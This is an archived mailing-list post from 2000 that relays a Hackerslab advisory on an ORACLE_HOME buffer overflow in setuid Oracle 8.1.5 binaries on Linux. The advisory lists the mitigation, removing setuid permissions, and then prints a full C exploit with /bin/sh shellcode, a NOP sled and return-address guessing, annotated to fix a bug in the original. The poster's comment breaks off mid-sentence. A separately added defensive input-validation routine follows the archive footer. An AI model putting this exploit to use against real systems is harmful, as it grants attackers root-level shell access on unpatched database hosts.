
securityfocus. Hackerslab Advisory. 8.1.5 Linux Platform

From: Juan Manuel Pascual Escriba <pask_at_plazasite.com>
Date: Mon, 30 Oct 2000 12:22:40 +0100
Message-Id: <10665.120557@fatcity.com>


On the 21st of October the Hackerslab guys published the following advisory on Oracle 8.1.5 security related themes.


             [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability


File : Oracle 8.1.5

SYSTEM : LINUX            Tested on RedHat Linux 6.2

INFO : There are two security vulnerabilities in Oracle.

  1. Buffer overflow: It is possible to create a buffer overflow vulnerability using "ORACLE_HOME", one of the environment variables of Oracle. The Oracle applications that are vulnerable to the buffer overflow are as follows:
     - names
     - namesctl
     - onrsd
     - osslogin
     - tnslsnr
     - tnsping
     - trcasst
     - trcroute
     These applications allow an attacker to execute a buffer overflow exploit.
  2. Log files created: When a user executes one of the Oracle applications such as names, oracle or tnslsnr, the following log files are created.

names:

-rw-rw-r-- 1 oracle dba       0 Oct 20 01:45 ckpcch.ora
-rw-rw-r-- 1 oracle dba     428 Oct 20 01:45 ckpreg.ora
-rw-rw-r-- 1 oracle dba     950 Oct 20 01:45 names.log

oracle:

-rw-rw---- 1 oracle dba     616 Oct 20 05:14 ora_[running pid].trc

tnslsnr:

-rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log

SOLUTION : Contact your vendor for a patch or remove the setuid permission.

# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute

==-------------------------------------------------------------------------------==
loveyou_at_hackerslab.org     [yong-jun, kim]     [ http://www.hackerslab.org ]
HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==




/*

        Oracle 8.1.5 exploit
                                -by loveyou

        offset value : -500 ~ +500

        Note: written for 32-bit x86 Linux; getesp() relies on the
        value left in %eax by the inline assembly being the return value.

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>             /* memset, strlen */

#define BUFFER                  800
#define NOP                     0x90
#define PATH               "/hackerslab/loveyou/oracle/8.1.5/bin/names"

char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d"                      /* jmp   callz                */
/* start: */
"\x5e"                          /* popl  %esi                 */
"\x29\xc0"                      /* subl  %eax, %eax           */
"\x88\x46\x07"                  /* movb  %al, 0x07(%esi)      */
"\x89\x46\x0c"                  /* movl  %eax, 0x0c(%esi)     */
"\x89\x76\x08"                  /* movl  %esi, 0x08(%esi)     */
"\xb0\x0b"                      /* movb  $0x0b, %al           */
"\x87\xf3"                      /* xchgl %esi, %ebx           */
"\x8d\x4b\x08"                  /* leal  0x08(%ebx), %ecx     */
"\x8d\x53\x0c"                  /* leal  0x0c(%ebx), %edx     */
"\xcd\x80"                      /* int   $0x80                */
"\x29\xc0"                      /* subl  %eax, %eax           */
"\x40"                          /* incl  %eax                 */
"\xcd\x80"                      /* int   $0x80                */
/* callz: */
"\xe8\xde\xff\xff\xff"          /* call  start                */
"/bin/sh";

/* Return the current stack pointer (32-bit x86 only). */
unsigned long getesp(void)
{
        __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
        char *buff, *ptr;
        long *addr_ptr, addr;
        int bsize = BUFFER;
        int i, offset;

        offset = 0;

        if (argc > 1) offset = atoi(argv[1]);

        buff = malloc(bsize);
        addr = getesp() - 5933 - offset;
        ptr = buff;
        addr_ptr = (long *) ptr;

        /* fill the whole buffer with the guessed return address */
        for (i = 0; i < bsize; i += 4)
                *(addr_ptr++) = addr;

        /* turn the first half into a NOP sled (the original had the
           memset() arguments swapped: memset(buff, bsize/2, NOP)) */
        memset(buff, NOP, bsize/2);

        /* place the shellcode in the middle of the buffer */
        ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
        for (i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';

        /* the overlong value is passed through the environment */
        setenv("ORACLE_HOME", buff, 1);

        printf("[ offset:%d buffer=%d ret:0x%lx ]\n",
                offset, (int) strlen(buff), addr);
        system(PATH);

        return 0;
}

I try to test these overflows with my 8.1.5 binaries. The buffer overflow

Received on Mon Oct 30 2000 - 05:22:40 CST
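The root cause in the advisory is a privileged Oracle binary trusting the length of ORACLE_HOME. As an added example (not code from the advisory, Hackerslab or Oracle), here is a bounds-checked reader for that variable in C: the 256-byte field size and the absolute-path, printable-ASCII policy are assumptions, and check_nop_sled() feeds it a constructed 800-byte filler shaped like the exploit's buffer to show it is rejected rather than copied.

```c
/* Added example (not from the advisory or the mail): bounds-checked reading of
 * ORACLE_HOME in a privileged program. The advisory does not name the
 * overflowing call; the field size and the printable-ASCII policy are assumed. */
#define _POSIX_C_SOURCE 200112L   /* setenv() */
#include <stdlib.h>
#include <string.h>

#define ORACLE_HOME_MAX 256   /* assumed size of the fixed field being filled */

/* Vulnerable shape the advisory's ORACLE_HOME overflow targets (generic, do not use):
 *     char home[ORACLE_HOME_MAX]; strcpy(home, getenv("ORACLE_HOME")); */
/* Hardened: validate before copying. 0 ok, -1 unset, -2 too long (rejected,
 * not truncated), -3 not an absolute path, -4 byte outside printable ASCII. */
int read_oracle_home(char *dst, size_t dstlen)
{
    const char *env = getenv("ORACLE_HOME");
    size_t len = 0, i;
    if (env == NULL || dstlen == 0)
        return -1;
    while (len < dstlen && env[len] != '\0')   /* never scan past dstlen */
        len++;
    if (len >= dstlen)                         /* no room left for the NUL */
        return -2;
    if (env[0] != '/')
        return -3;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)env[i];
        if (c < 0x20 || c > 0x7e)              /* NOP sleds and addresses never pass */
            return -4;
    }
    memcpy(dst, env, len + 1);
    return 0;
}

char last_home[ORACLE_HOME_MAX];   /* filled only on a successful read */

/* Set ORACLE_HOME to value (as the exploit's setenv() does) and return the verdict. */
int check_oracle_home(const char *value)
{
    if (setenv("ORACLE_HOME", value, 1) != 0)
        return -99;
    return read_oracle_home(last_home, sizeof last_home);
}

/* Constructed input shaped like the advisory's 800-byte exploit buffer of 0x90. */
int check_nop_sled(void)
{
    char sled[800];
    memset(sled, 0x90, sizeof sled - 1);
    sled[sizeof sled - 1] = '\0';
    return check_oracle_home(sled);
}
```

Rejecting instead of truncating matters: a silently truncated path still lets the binary run with a value the attacker shaped, while a refusal leaves a clear failure to log.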

